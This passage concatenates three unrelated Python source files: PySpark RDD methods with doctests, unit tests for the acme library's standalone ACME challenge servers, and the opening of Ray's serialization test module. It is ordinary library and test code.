def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)\
if spill else InMemoryMerger(agg)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
# forward the shuffle flag to the JVM-side coalesce
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD, the second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
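# Note on the re-batching above: zip() works by zipping the underlying Java
# RDDs of pickled batches, so both sides must use the same fixed batch size or
# the pairs would come out misaligned; mismatched or auto-batched serializers
# are therefore re-serialized with a common batchSize before the JVM-level zip.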
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
if relativeSD > 0.37:
raise ValueError("relativeSD should be smaller than 0.37")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps((command, sys.version_info[:2]))
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
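# Note: pipeline_func above composes the parent's function with the new one,
# so a chain such as
#   rdd.map(f).filter(g)
# collapses into a single PipelinedRDD whose func is roughly
#   lambda split, it: filter_func(split, map_func(split, it))
# evaluated against the first non-pipelined ancestor (_prev_jrdd), i.e. one
# Python worker pass per stage rather than one per transformation
# (illustrative description; map_func/filter_func are placeholder names).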
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
standalone_test.py
|
"""Tests for acme.standalone."""
import multiprocessing
import os
import shutil
import socket
import threading
import tempfile
import unittest
import time
from contextlib import closing
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # type: ignore # pylint: disable=import-error
import josepy as jose
import mock
import requests
from acme import challenges
from acme import crypto_util
from acme import errors
from acme import test_util
from acme.magic_typing import Set # pylint: disable=unused-import, no-name-in-module
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close()
def test_ipv6(self):
if socket.has_ipv6:
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True, ipv6=True)
server.server_close()
class TLSSNI01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01Server."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01Server
self.server = TLSSNI01Server(('localhost', 0), certs=self.certs)
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_it(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class BaseDualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.BaseDualNetworkedServers."""
class SingleProtocolServer(socketserver.TCPServer):
"""Server that only serves on a single protocol. FreeBSD has this behavior for AF_INET6."""
def __init__(self, *args, **kwargs):
ipv6 = kwargs.pop("ipv6", False)
if ipv6:
self.address_family = socket.AF_INET6
kwargs["bind_and_activate"] = False
else:
self.address_family = socket.AF_INET
socketserver.TCPServer.__init__(self, *args, **kwargs)
if ipv6:
# NB: On Windows, socket.IPPROTO_IPV6 constant may be missing.
# We use the corresponding value (41) instead.
level = getattr(socket, "IPPROTO_IPV6", 41)
self.socket.setsockopt(level, socket.IPV6_V6ONLY, 1)
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
@mock.patch("socket.socket.bind")
def test_fail_to_bind(self, mock_bind):
mock_bind.side_effect = socket.error
from acme.standalone import BaseDualNetworkedServers
self.assertRaises(socket.error, BaseDualNetworkedServers,
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
def test_ports_equal(self):
from acme.standalone import BaseDualNetworkedServers
servers = BaseDualNetworkedServers(
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
socknames = servers.getsocknames()
prev_port = None
# assert ports are equal
for sockname in socknames:
port = sockname[1]
if prev_port:
self.assertEqual(prev_port, port)
prev_port = port
class TLSSNI01DualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01DualNetworkedServers."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01DualNetworkedServers
self.servers = TLSSNI01DualNetworkedServers(('localhost', 0), certs=self.certs)
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_connect(self):
socknames = self.servers.getsocknames()
# connect to all addresses
for sockname in socknames:
host, port = sockname[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01DualNetworkedServersTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01DualNetworkedServers."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01DualNetworkedServers
self.servers = HTTP01DualNetworkedServers(('', 0), resources=self.resources)
self.port = self.servers.getsocknames()[0][1]
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class TestSimpleTLSSNI01Server(unittest.TestCase):
"""Tests for acme.standalone.simple_tls_sni_01_server."""
def setUp(self):
# mirror ../examples/standalone
self.test_cwd = tempfile.mkdtemp()
localhost_dir = os.path.join(self.test_cwd, 'localhost')
os.makedirs(localhost_dir)
shutil.copy(test_util.vector_path('rsa2048_cert.pem'),
os.path.join(localhost_dir, 'cert.pem'))
shutil.copy(test_util.vector_path('rsa2048_key.pem'),
os.path.join(localhost_dir, 'key.pem'))
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port = sock.getsockname()[1]
from acme.standalone import simple_tls_sni_01_server
self.process = multiprocessing.Process(target=simple_tls_sni_01_server,
args=(['path', '-p', str(self.port)],))
self.old_cwd = os.getcwd()
os.chdir(self.test_cwd)
def tearDown(self):
os.chdir(self.old_cwd)
if self.process.is_alive():
self.process.terminate()
self.process.join(timeout=5)
# Check that we didn't timeout waiting for the process to
# terminate.
self.assertNotEqual(self.process.exitcode, None)
shutil.rmtree(self.test_cwd)
@mock.patch('acme.standalone.TLSSNI01Server.handle_request')
def test_mock(self, handle):
from acme.standalone import simple_tls_sni_01_server
simple_tls_sni_01_server(cli_args=['path', '-p', str(self.port)], forever=False)
self.assertEqual(handle.call_count, 1)
def test_live(self):
self.process.start()
cert = None
for _ in range(50):
time.sleep(0.1)
try:
cert = crypto_util.probe_sni(b'localhost', b'127.0.0.1', self.port)
break
except errors.Error: # pragma: no cover
pass
self.assertEqual(jose.ComparableX509(cert),
test_util.load_comparable_cert('rsa2048_cert.pem'))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
runtest.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import random
import re
import setproctitle
import string
import subprocess
import sys
import threading
import time
from collections import defaultdict, namedtuple, OrderedDict
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.test.cluster_utils
import ray.test.test_utils
logger = logging.getLogger(__name__)
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different.".format(
obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
        }
    )
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3])
]
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = (
[{
obj: obj
} for obj in PRIMITIVE_OBJECTS
if (obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS
@pytest.fixture
